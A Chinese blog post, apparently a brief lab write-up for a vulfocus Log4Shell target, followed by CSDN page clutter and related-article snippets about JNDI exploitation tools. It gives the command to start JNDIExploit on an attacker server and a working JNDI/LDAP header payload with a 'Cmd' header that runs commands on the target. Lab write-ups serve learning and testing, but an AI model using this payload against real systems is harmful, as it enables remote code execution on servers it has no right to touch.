log4shell-vulnerable-app

最新推荐文章于 2024-05-04 18:17:47 发布

仲瑿

最新推荐文章于 2024-05-04 18:17:47 发布

阅读量389

点赞数 1

分类专栏： vulfovus 文章标签： java 开发语言

本文链接：https://blog.csdn.net/m0_49025459/article/details/128206212

版权

vulfovus 专栏收录该内容

15 篇文章 1 订阅

订阅专栏

开启靶机环境并访问

使用JNDIExploit-1.2-SNAPSHOT在自己的vps上开启服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx-l 1234 -p 2345

抓包填写payload，获得flag

X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}

Content-Type:application/x-www-from-urlencoded

Cmd:ls /tmp

若有收获，就点个赞吧

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

仲瑿

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
log4shell-vulnerable-app

使用JNDIExploit-1.2-SNAPSHOT在自己的vps上开启服务抓包填写payload，获得flag若有收获，就点个赞吧
复制链接

扫一扫

专栏目录

命令执行（RCE）与反序列化

赤赤三的博客

03-24

5847

命令执行（RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。）：分类：远程系统命令执行exec()、system()、assert()：设计者在编写代码时没有做严格的安全控制，导致攻击者通过接口或相关参数提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器。涉及系统命令：assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号） .

maven-vulnerable-app

03-19

【maven-vulnerable-app】是一个开源项目，主要目的是为了演示和学习Maven构建的应用程序中常见的安全漏洞。这个项目对于开发者、安全工程师以及热衷于软件安全的人来说具有很高的教育价值。通过研究和分析这个项目...

参与评论您还未登录，请先登录后发表或查看评论

JNDIExploit-1.2-SNAPSHOT

03-20

JNDIExploit-1.2-SNAPSHOT

网络安全最新【漏洞复现】2(1)

最新发布

2401_84302796的博客

05-04

975

替换工具生成的payload：rmi://192.168.71.128:1099/mrflzc 到Burpsuite，其中生成的链接后面的codebaseClass是6位随机的，因为不希望工具生成的链接本身成为一种特征呗监控或拦截。服务器地址实际上就是codebase地址，相比于marshalsec中的JNDI server来说，这个工具把JNDI server和HTTP server绑定到一起，并自动启动HTTPserver返回相应class，更自动化了。开启新的窗口监听4444端口。

JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

wutiangui的博客

09-07

1784

再开一个cmd可以看下能用什么payload。以上payload都可以尝试，我们使用。Windows攻击端执行以下命令。请求包中增加cmd:whoami。1.首先搭建log4j靶场。执行后发现命令可以执行。

使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程

m0_74196038的博客

03-19

1138

还有就是之所以这个实验做了两次，就是因为在这个实验当中，我第一次做的时候，由于这个复现是使用那个脚本，所以直接使用命令去开启http服务和ldap服务，但是我发现开启了http服务，但是没法访问到，我以为是环境的问题，就打算第二天再做。结果第二天还是不行，后来终于搞明白了，他这里使用工具开启http服务的指令，实际上并没有真正的开启http服务，只是做了一个端口监听，让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip，也就是攻击者的ip，也可以是黑客的公网服务器。

【漏洞复现】Weblogic CVE-2023-21839

zg_111的博客

03-23

6457

Weblogic CVE-2023-21839漏洞复现

pr-with-vulnerable-dependencies

05-05

扫描PR以查找易受攻击的依赖项扫描在PR中提交，以检查它是否为仓库的依赖项添加了漏洞输入 GITHUB_TOKEN 使用： ${{ secrets.GITHUB_TOKEN }} ... uses : pedrolacerda/pr-with-vulnerable-dependencies@master

damn-vulnerable-defi

03-31

在Ethereum中破解DeFi实施的一系列挑战。拥有快速贷款，Oracle，治理，NFT，贷款池等等！由在OpenZeppelin创建玩访问！故障排除有些用户报告与节点的特定版本。我已经成功安装了所有依赖项，并使用v12.20.0...

CORS-vulnerable-Lab:样本易受攻击的代码及其利用代码

05-05

CORS配置错误易受攻击的实验室该存储库包含与CORS错误配置相关的易受攻击的代码。可以在本地计算机上配置易受攻击的代码，以实际利用CORS相关的错误配置问题。我想对@albinowax（感谢他在CORS开发中的工作），...

Damn-Vulnerable-Bank:Android的脆弱银行应用程序

03-17

该死的脆弱银行关于申请该死的脆弱银行Android应用程序旨在为每个人提供一个界面，以详细了解Android应用程序的内部和安全方面。如何使用应用程序克隆存储库并按照链接中的说明运行。我们已经发布了Apk，因此下载后...

JNDIExploit.zip

12-14

JNDIExploit

JNDIExploit-1.4-SNAPSHOT.jar

01-10

编译后的JNDIExploit-1.4-SNAPSHOT.jar，可以直接用，1.4版本支持tomcatBypass路由直接上线msf。

JNDIExploit-1.3-SNAPSHOT.jar

04-28

JNDIExploit是一款常用的用于JNDI注入利用的工具，命令执行&代码执行漏洞中常用的测试工具。

JNDI-Inject-Exploit

11-04

# JNDI-Inject-Exploit ## 免责声明本工具仅面向**合法授权的企业安全测试**，如您需测试本工具的可用性请自行搭建靶机环境，在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。**请勿对非授权目标进行扫描，如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，作者将不承担任何法律及连带责任。** ## Introduce > 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景中针对高版本JDK无法加载远程恶意类，通过LDAP服务器返回原生Java反序列化数据，受害者（客户端）在具备反序列化Gadget依赖的情况下可达到命令执行、代码执行、回显命令执行、无文件落地内存马注册等。 > > Solve the high version of JDK Bypass, like FastJson, Jackson, Log4j2, native JNDI injection vulnerabilities, and detect locally available deserialization gad

【实战】一次简单的log4j漏洞测试

crowsec

12-19

3295

【实战】一次简单的log4j漏洞测试

JNDIExploit使用方法

qq_50854662的博客

02-28

3618

JNDIExploit使用方法

什么是http-cross-domain-policy vulnerable

06-12

"HTTP Cross Domain Policy Vulnerable"是指一个Web应用程序存在跨域策略不当的漏洞，攻击者可以利用该漏洞在目标系统上进行跨站点请求。这种类型的漏洞通常是由于应用程序没有正确地配置跨域策略或者使用了不安全的...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交